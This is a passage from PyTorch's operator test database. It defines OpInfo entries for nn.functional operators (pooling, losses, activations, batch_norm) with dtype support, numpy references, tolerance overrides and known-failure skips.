sample_inputs_func=partial(sample_inputs_upsample, 'bilinear'), skips=( # RuntimeError: false # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, # please report a bug to PyTorch. 
DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False), OpInfo( "nn.functional.soft_margin_loss", ref=_NOTHING, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.bfloat16, torch.float16), supports_out=False, supports_forward_ad=True, # doesn't support grad on target sample_inputs_func=partial(sample_inputs_loss, rhs_requires_grad=False), ), OpInfo('nn.functional.upsample_nearest', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_types_and(torch.uint8, torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.uint8), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=partial(sample_inputs_upsample, 'nearest'), skips=( # RuntimeError: false # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, # please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False), OpInfo( "nn.functional.margin_ranking_loss", ref=_NOTHING, dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bfloat16, torch.float16), supports_out=False, sample_inputs_func=sample_inputs_margin_ranking_loss, error_inputs_func=error_inputs_margin_ranking_loss, reference_inputs_func=reference_inputs_margin_ranking_loss, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), )), OpInfo( "nn.functional.multi_margin_loss", ref=_NOTHING, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.bfloat16, torch.float16), supports_out=False, supports_gradgrad=False, sample_inputs_func=sample_inputs_multi_margin_loss, ), OpInfo( "nn.functional.multilabel_margin_loss", ref=_NOTHING, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.bfloat16, torch.float16), supports_out=False, supports_gradgrad=False, sample_inputs_func=sample_inputs_multilabel_margin_loss ), OpInfo('nn.functional.leaky_relu', aliases=None, aten_name="leaky_relu", aten_backward_name='leaky_relu_backward', sample_inputs_func=sample_inputs_leaky_relu, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_autograd=True, assert_autodiffed=True, supports_gradgrad=True, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, autodiff_nonfusible_nodes=["aten::leaky_relu"]), OpInfo( "nn.functional.multilabel_soft_margin_loss", ref=_NOTHING, supports_out=False, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16), sample_inputs_func=sample_inputs_multilabel_soft_margin_loss, supports_forward_ad=True, decorators=( DecorateInfo( toleranceOverride({torch.float32: tol(atol=1e-4, rtol=1e-4)}), "TestJit", "test_variant_consistency_jit", ), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness'), ), skips=( # AssertionError: False is not true : Scalars failed to compare as equal! 0 != 4096 # __main__.TestJitCUDA.test_variant_consistency_jit_nn_functional_multilabel_soft_margin_loss_cuda_float32 # leaked 4096 bytes CUDA memory on device 0 DecorateInfo( # Skip instead of expectedFailure because this fails # locally for me but passes in CI. 
unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit", device_type="cuda", ), ), ), OpInfo('nn.functional.avg_pool2d', aten_name='avg_pool2d', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_types_and(torch.int64, torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_avgpool2d, skips=( DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out', device_type='cuda'), )), OpInfo('nn.functional.fractional_max_pool2d', supports_autograd=True, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, op=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.fractional_max_pool2d, input, *args, **kwargs), # vmap does not support random operations check_batched_forward_grad=False, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16), test_neg_view=False, sample_inputs_func=sample_inputs_fractional_max_pool2d, decorators=( # FIXME: AssertionError: False is not true : Tensors failed to compare as equal! DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # RuntimeError: input->type()->kind() == TypeKind::OptionalType # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":270 DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'))), OpInfo('nn.functional.fractional_max_pool3d', supports_autograd=True, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, op=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.fractional_max_pool3d, input, *args, **kwargs), # vmap does not support random operations check_batched_forward_grad=False, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16), test_neg_view=False, sample_inputs_func=sample_inputs_fractional_max_pool3d, decorators=( # FIXME: both derivatives are implemented incorrectly # https://github.com/pytorch/pytorch/issues/69322 # FIXME: AssertionError: False is not true : Tensors failed to compare as equal! 
                           DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'),
                           # RuntimeError: input->type()->kind() == TypeKind::OptionalType
                           # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":270
                           DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'),)),
    OpInfo('nn.functional.max_pool1d',
           aten_name='max_pool1d',
           supports_autograd=True,
           supports_out=False,
           supports_forward_ad=True,
           supports_fwgrad_bwgrad=True,
           # got: Batching rule not implemented for aten::flatten.using_ints
           check_batched_forward_grad=False,
           # TODO: add shape checks
           assert_jit_shape_analysis=False,
           dtypes=floating_types_and(torch.bfloat16),
           dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16),
           skips=(
               # Pre-existing condition; needs to be fixed
               DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_operator', device_type='cpu'),
               DecorateInfo(unittest.skip("Works on some configs"), 'TestNNCOpInfo',
                            'test_nnc_correctness', dtypes=(torch.bfloat16,)),
               DecorateInfo(unittest.skip("Works on some configs"), 'TestCudaFuserOpInfo',
                            'test_nvfuser_correctness', dtypes=(torch.bfloat16,)),
           ),
           sample_inputs_func=sample_inputs_max_pool),
    OpInfo('nn.functional.max_pool2d',
           aten_name='max_pool2d',
           supports_autograd=True,
           # Vmap is not happy with non-contiguous (channels_last) inputs
           check_batched_gradgrad=False,
           supports_out=False,
           supports_forward_ad=True,
           supports_fwgrad_bwgrad=True,
           # got: Batching rule not implemented for aten::flatten.using_ints
           check_batched_forward_grad=False,
           assert_jit_shape_analysis=True,
           dtypes=floating_types_and(torch.bfloat16),
           dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16),
           sample_inputs_func=sample_inputs_max_pool),
    OpInfo('nn.functional.max_pool3d',
           aten_name='max_pool3d',
           supports_autograd=True,
           supports_out=False,
           supports_forward_ad=True,
           supports_fwgrad_bwgrad=True,
           # got: Batching rule not implemented for aten::flatten.using_ints
           check_batched_forward_grad=False,
           # TODO: add shape checks
           assert_jit_shape_analysis=False,
           dtypes=floating_types(),
           dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16),
           # TODO: investigate nondeterminism
           gradcheck_nondet_tol=GRADCHECK_NONDET_TOL,
           sample_inputs_func=sample_inputs_max_pool),
    OpInfo('nn.functional.max_unpool1d',
           aten_name='max_unpool1d',
           supports_autograd=True,
           supports_forward_ad=True,
           supports_fwgrad_bwgrad=True,
           supports_out=False,
           assert_jit_shape_analysis=False,
           dtypes=floating_types(),
           dtypesIfCUDA=floating_types_and(torch.float16),
           sample_inputs_func=sample_inputs_max_unpool,
           skips=(
               # Gradients are tested in `variant_test_name=grad` below.
               # We skip tests here because there is non-determinism in backward
               # with gather, when there are writes into the same memory location,
               # and if there are several indices pointing to the same memory,
               # gradcheck is oblivious about that and cannot perturb them all at once
               # (see sample_inputs_max_unpool_grad to find out more).
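               # A rough sketch of the aliasing problem described above (hypothetical
               # values): if two unpooling indices both equal 0, both inputs write to
               # output[0], so a finite-difference perturbation of either input alone
               # changes the shared output slot in a way gradcheck cannot attribute
               # to the right input element.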
DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_grad'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_gradgrad'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_forward_mode_AD'), )), OpInfo('nn.functional.max_unpool1d', variant_test_name='grad', aten_name='max_unpool1d', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, assert_jit_shape_analysis=False, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16), sample_inputs_func=sample_inputs_max_unpool_grad), OpInfo('nn.functional.max_unpool2d', aten_name='max_unpool2d', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, assert_jit_shape_analysis=False, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16), sample_inputs_func=sample_inputs_max_unpool, skips=( # Gradients are tested in `variant_test_name=grad` below. # We skip tests here because there is non-determinism in backward # with gather, when there are writes into the same memory location, # and if there are several indices pointing to the same memory, # gradcheck is oblivious about that and cannot perturb them all at once # (see sample_inputs_max_unpool_grad to find out more). DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_forward_mode_AD'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_gradgrad'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_grad'), )), OpInfo('nn.functional.max_unpool2d', variant_test_name='grad', aten_name='max_unpool2d', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # Vmap is not happy with non-contiguous (channels_last) inputs check_batched_grad=False, supports_out=False, assert_jit_shape_analysis=False, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16), sample_inputs_func=sample_inputs_max_unpool_grad), OpInfo('nn.functional.max_unpool3d', aten_name='max_unpool3d', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, assert_jit_shape_analysis=False, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16), sample_inputs_func=sample_inputs_max_unpool, skips=( # Gradients are tested in `variant_test_name=grad` below. # We skip tests here because there is non-determinism in backward # with gather, when there are writes into the same memory location, # and if there are several indices pointing to the same memory, # gradcheck is oblivious about that and cannot perturb them all at once # (see sample_inputs_max_unpool_grad to find out more). 
DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_forward_mode_AD'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_gradgrad'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_grad'), )), OpInfo('nn.functional.max_unpool3d', variant_test_name='grad', aten_name='max_unpool3d', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, assert_jit_shape_analysis=False, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16), sample_inputs_func=sample_inputs_max_unpool_grad), OpInfo('nn.functional.linear', aten_name='linear', supports_autograd=True, sample_inputs_func=sample_inputs_linear, dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfROCM=floating_and_complex_types_and(torch.float16, torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), backward_dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), # linear calls mm under the hood which is nondeterministic on CUDA # https://pytorch.org/docs/stable/generated/torch.use_deterministic_algorithms.html#torch.use_deterministic_algorithms gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # See https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, supports_expanded_weight=True, decorators=( DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness'), )), OpInfo('nn.functional.bilinear', aten_name='bilinear', supports_autograd=True, sample_inputs_func=sample_inputs_bilinear, dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, *[torch.bfloat16] if (SM53OrLater and CUDA11OrLater) or TEST_WITH_ROCM else []), skips=( # NVIDIA only assures that bfloat16 is supported by bmm if SM >= 5.3 DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_dtypes', device_type='cuda', active_if=not SM53OrLater), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.bfloat16,)), ), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), OpInfo('nn.functional.glu', aten_name='glu', supports_autograd=True, sample_inputs_func=sample_inputs_glu, dtypes=floating_types_and(torch.bfloat16), dtypesIfROCM=floating_types_and(torch.float16, torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), backward_dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), UnaryUfuncInfo( 'nn.functional.elu', aten_backward_name='elu_backward', ref=lambda x, alpha=1.0, inplace=False: np.maximum(0., x) + np.minimum(0., alpha * (np.exp(x) - 1)), dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_autograd=True, assert_autodiffed=False, supports_gradgrad=True, supports_out=False, sample_kwargs=lambda device, dtype, input: ({'alpha': 0.8}, {'alpha': 0.8}), inplace_variant=lambda x, alpha=1.0: torch.nn.functional.elu(x, alpha, inplace=True), decorators=[ # Not implemented yet DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_inplace_forward_mode_AD'), DecorateInfo( toleranceOverride({ torch.float16: tol(atol=1e-03, rtol=1.2e-03), torch.bfloat16: tol(atol=1e-03, 
rtol=1.2e-03) }), 'TestUnaryUfuncs', device_type='cuda', ), ], ), OpInfo( 'nn.functional.prelu', aten_backward_name='prelu_backward', ref=lambda x, weight: np.maximum(0., x) + np.minimum(0., x) * (weight if x.ndim == 1 else weight.reshape([weight.size if i == 1 else 1 for i in range(0, x.ndim)])), dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_autograd=True, assert_autodiffed=False, supports_gradgrad=True, supports_out=False, sample_inputs_func=sample_inputs_nn_functional_prelu, decorators=[ # FIXME: second derivative is implemented but seems to be incorrect # https://github.com/pytorch/pytorch/issues/68760 DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_gradgrad'), # RuntimeError: Cannot insert a Tensor that requires grad as a constant. # Consider making it a parameter or input, or detaching the gradient # https://github.com/pytorch/pytorch/issues/68752 DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ], ), UnaryUfuncInfo( 'nn.functional.celu', ref=lambda x, alpha=1.0, inplace=False: np.maximum(0., x) + np.minimum(0., alpha * (np.exp(x / alpha) - 1)), dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_autograd=True, assert_autodiffed=False, supports_gradgrad=True, supports_out=False, sample_kwargs=lambda device, dtype, input: ({'alpha': 0.8}, {'alpha': 0.8}), inplace_variant=lambda x, alpha=1.0: torch.nn.functional.celu(x, alpha, inplace=True), decorators=[ # Not implemented yet DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_inplace_forward_mode_AD'), DecorateInfo( toleranceOverride({ torch.float16: tol(atol=1e-03, rtol=1.2e-03), torch.bfloat16: tol(atol=1e-03, rtol=1.2e-03) }), 'TestUnaryUfuncs', device_type='cuda', ), ], ), UnaryUfuncInfo( 'nn.functional.rrelu', aten_backward_name='rrelu_with_noise_backward', op=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.rrelu, input, *args, **kwargs), ref=_NOTHING, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), gradcheck_wrapper=wrapper_set_seed, supports_forward_ad=True, supports_autograd=True, assert_autodiffed=False, supports_gradgrad=True, supports_out=False, sample_kwargs=lambda device, dtype, input: ({'lower': 0., 'upper': 1.}, {'lower': 0., 'upper': 1.}), inplace_variant=lambda input, *args, **kwargs: wrapper_set_seed(partial(torch.nn.functional.rrelu, inplace=True), input, *args, **kwargs), decorators=( DecorateInfo( toleranceOverride({ torch.float16: tol(atol=1e-03, rtol=1.2e-03), torch.bfloat16: tol(atol=1e-03, rtol=1.2e-03) }), 'TestUnaryUfuncs', device_type='cuda', ),), skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # In-place operations do not play well with forward AD # https://github.com/pytorch/pytorch/issues/77447 DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_inplace_forward_mode_AD'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'),)), UnaryUfuncInfo( 'nn.functional.selu', ref=lambda x, inplace=False: 1.0507009873554804934193349852946 * ( np.maximum(0., x) + np.minimum(0., 1.6732632423543772848170429916717 * (np.exp(x) - 1)) ), dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), 
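        # (The long constants in `ref` above are, to high precision, the standard
        # SELU scale ~1.0507 and alpha ~1.6733 from Klambauer et al.,
        # "Self-Normalizing Neural Networks".)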
supports_forward_ad=True, # depends on 'elu' supports_fwgrad_bwgrad=True, supports_autograd=True, assert_autodiffed=False, supports_gradgrad=True, supports_out=False, inplace_variant=lambda x: torch.nn.functional.selu(x, inplace=True), decorators=[ # Not implemented yet (depends on 'elu_') DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_inplace_forward_mode_AD'), DecorateInfo( toleranceOverride({ torch.float16: tol(atol=1e-2, rtol=1.8e-2), torch.bfloat16: tol(atol=1e-2, rtol=1.8e-2) }), 'TestUnaryUfuncs', device_type='cuda', ), ], ), UnaryUfuncInfo( 'nn.functional.silu', aten_backward_name='silu_backward', ref=lambda x, inplace=False: x / (1 + np.exp(-x)), dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_autograd=True, supports_fwgrad_bwgrad=True, assert_autodiffed=False, supports_out=False, inplace_variant=lambda x: torch.nn.functional.silu(x, inplace=True), decorators=[ DecorateInfo( toleranceOverride({ torch.float16: tol(atol=1e-3, rtol=1e-3), torch.bfloat16: tol(atol=1e-4, rtol=1e-4) }), 'TestUnaryUfuncs', device_type='cuda', ), ], skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_normal', dtypes=(torch.cfloat,), device_type='cpu'), ) ), # TODO: combine this with the nn.functional.silu OpInfo when # complex autodiff for silu is supported or when # the forward bug is fixed # Note: silu errors when given inputs that require grad # but it doesn't support grad in their dtype # This is why the dtypes list above passes test_dtypes, # because it's getting lucky and failing in forward # because test_dtypes sets requires_grad to True # THIS IS A BUG UnaryUfuncInfo( 'nn.functional.silu', variant_test_name='complex', ref=lambda x, inplace=False: x / (1 + np.exp(-x)), dtypes=complex_types(), dtypesIfCUDA=empty_types(), supports_forward_ad=False, supports_autograd=False, assert_autodiffed=False, supports_out=False, inplace_variant=lambda x: torch.nn.functional.silu(x, inplace=True), decorators=[ DecorateInfo( toleranceOverride({ torch.float16: tol(atol=1e-3, rtol=1e-3), torch.bfloat16: tol(atol=1e-4, rtol=1e-4) }), 'TestUnaryUfuncs', device_type='cuda', ), ], skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_normal', dtypes=(torch.cfloat,), device_type='cpu'), # FIXME: intentionally misreports dtypes DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_dtypes'), # FIXME: numpy reference diverges: Comparing (nan+nanj) and (-0+0j) DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=(torch.complex64, torch.cdouble)), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', dtypes=(torch.complex64,)), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=(torch.complex64,)))), UnaryUfuncInfo( 'nn.functional.hardsigmoid', aten_backward_name='hardsigmoid_backward', ref=reference_hardsigmoid, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_autograd=True, assert_autodiffed=False, supports_gradgrad=False, supports_forward_ad=True, supports_out=False, inplace_variant=partial(torch.nn.functional.hardsigmoid, inplace=True), decorators=[ DecorateInfo( toleranceOverride({torch.float16: tol(atol=1e-04, rtol=0.001)}), 'TestUnaryUfuncs', device_type='cuda',), ], skips=[ # still want to test that first derivative works though 
second derivative isn't supported DecorateInfo(unittest.expectedFailure, 'TestGradients', "test_inplace_gradgrad"), # produces 0 instead of nan on ROCM DecorateInfo(unittest.expectedFailure, 'TestUnaryUfuncs', "test_reference_numerics_extremal", device_type='cuda', active_if=(TEST_WITH_ROCM)), ] ), UnaryUfuncInfo( 'nn.functional.logsigmoid', aten_name="log_sigmoid", aten_backward_name='log_sigmoid_backward', ref=reference_logsigmoid, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16), supports_autograd=True, assert_autodiffed=False, supports_forward_ad=True, supports_gradgrad=True, # autodiff_nonfusible_nodes=["aten::log_sigmoid"], decorators=[ DecorateInfo( precisionOverride({torch.float16: 1e-2, torch.bfloat16: 5e-3}), 'TestUnaryUfuncs', 'test_reference_numerics_small'), DecorateInfo( precisionOverride({torch.float16: 1e-2, torch.bfloat16: 5e-3}), 'TestUnaryUfuncs', 'test_reference_numerics_large'), DecorateInfo( precisionOverride({torch.float16: 1e-2, torch.bfloat16: 5e-3}), 'TestUnaryUfuncs', 'test_reference_numerics_extremal'), ], skips=( # Resized a non-empty tensor but did not warn about it. DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning', device_type='cpu'), ), ), UnaryUfuncInfo( 'nn.functional.mish', aten_backward_name='mish_backward', ref=lambda x: x * np.tanh(reference_softplus(x)), dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_autograd=True, assert_autodiffed=False, supports_gradgrad=True, supports_out=False, inplace_variant=partial(torch.nn.functional.mish, inplace=True), decorators=[ DecorateInfo( toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-03)}), 'TestUnaryUfuncs', device_type='cuda',), ], ), UnaryUfuncInfo( 'nn.functional.softsign', ref=lambda x: x / (np.abs(x) + 1), dtypes=all_types_and_complex_and(torch.float16, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.float16, torch.bfloat16, torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_autograd=True, assert_autodiffed=False, supports_gradgrad=True, supports_out=False, decorators=[ DecorateInfo( toleranceOverride({torch.float16: tol(atol=1e-03, rtol=1.3e-04)}), 'TestUnaryUfuncs',), ], skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', dtypes=(torch.int, torch.int8)), DecorateInfo(unittest.expectedFailure, 'TestGradients', "test_fn_fwgrad_bwgrad", dtypes=(torch.complex128,)), # pytorch computes (0+nanj), numpy computes (-5e-18-1j) for input (-501.-1.0000e+20j) DecorateInfo(unittest.expectedFailure, 'TestUnaryUfuncs', "test_reference_numerics_large", dtypes=(torch.complex64,)),), ), UnaryUfuncInfo( 'nn.functional.tanhshrink', ref=lambda x: x - np.tanh(x), dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_autograd=True, assert_autodiffed=False, supports_gradgrad=True, supports_out=False, decorators=[ DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_normal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo( toleranceOverride({torch.bfloat16: tol(atol=1e-02, rtol=1.6e-02)}), 'TestUnaryUfuncs',), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness'), ], skips=( # in each case, pytorch will produce a 
nan while numpy will not DecorateInfo(unittest.expectedFailure, 'TestUnaryUfuncs', "test_reference_numerics_small", dtypes=(torch.complex64, torch.complex128), active_if=(IS_MACOS)), DecorateInfo(unittest.skip("Fails on some jobs works on others!"), 'TestUnaryUfuncs', "test_reference_numerics_large", dtypes=(torch.complex64, torch.complex128), active_if=(IS_MACOS)), DecorateInfo(unittest.skip("Fails on some jobs works on others!"), 'TestUnaryUfuncs', "test_reference_numerics_extremal", dtypes=(torch.complex64, torch.complex128), device_type='cpu', active_if=(IS_MACOS or IS_WINDOWS)), ), ), OpInfo( 'nn.functional.threshold', aten_backward_name='threshold_backward', ref=lambda x, threshold, value: np.where(x > threshold, x, value).astype(x.dtype), dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16, torch.bfloat16), supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=False, supports_gradgrad=True, supports_out=False, sample_inputs_func=sample_inputs_threshold, ), OpInfo( "nn.functional.triplet_margin_loss", sample_inputs_func=sample_inputs_triplet_margin_loss, dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), OpInfo( "nn.functional.triplet_margin_with_distance_loss", sample_inputs_func=partial(sample_inputs_triplet_margin_loss, with_distance=True), dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # This test cannot handle a callable passed to `distance_function`. If we would use # `distance_function=None`, the test would pass fine. DecorateInfo( unittest.expectedFailure, "TestJit", "test_variant_consistency_jit", ), DecorateInfo( unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive", ), ), ), BinaryUfuncInfo('nextafter', dtypes=floating_types_and(torch.bfloat16), supports_autograd=False, supports_rhs_python_scalar=False), OpInfo('topk', dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bfloat16, torch.float16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_jit_shape_analysis=True, sample_inputs_func=sample_inputs_topk), # Multiple variants for batch_norm to test with and without cuDNN disabled # See https://github.com/pytorch/pytorch/pull/63218#discussion_r688549391 for more details OpInfo('nn.functional.batch_norm', aten_name='batch_norm', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, assert_jit_shape_analysis=True, sample_inputs_func=sample_inputs_batch_norm, skips=( # see https://github.com/pytorch/pytorch/issues/71286 DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness'), DecorateInfo(unittest.skip('Skipped!'), 'TestNNCOpInfo', 'test_nnc_correctness', device_type='cpu', dtypes=(torch.bfloat16,)), # see https://github.com/pytorch/pytorch/issues/76283 DecorateInfo(unittest.skip("Fails on UBSAN!"), 'TestCompositeCompliance', 'test_forward_ad', device_type="cpu"), # Trying to use forward AD with miopen_batch_norm that does not support it # because it has not been implemented yet. 
DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad', device_type="cuda", active_if=TEST_WITH_ROCM), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness'), )), # This variant tests batch_norm with cuDNN disabled only on CUDA devices OpInfo('nn.functional.batch_norm', variant_test_name='without_cudnn', aten_name='batch_norm', dtypes=empty_types(), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, decorators=[onlyCUDA, disablecuDNN], skips=( DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad', device_type='cpu'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness'), ), sample_inputs_func=sample_inputs_batch_norm), OpInfo( "nn.functional.binary_cross_entropy", aten_backward_name='binary_cross_entropy_backward', sample_inputs_func=sample_inputs_binary_cross_entropy, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, gradcheck_fast_mode=False, supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=( # RuntimeError: expected int at position 0, but got: Tensor DecorateInfo( unittest.skip("Skipped!"), "TestCudaFuserOpInfo", ), # RuntimeError: expected int at 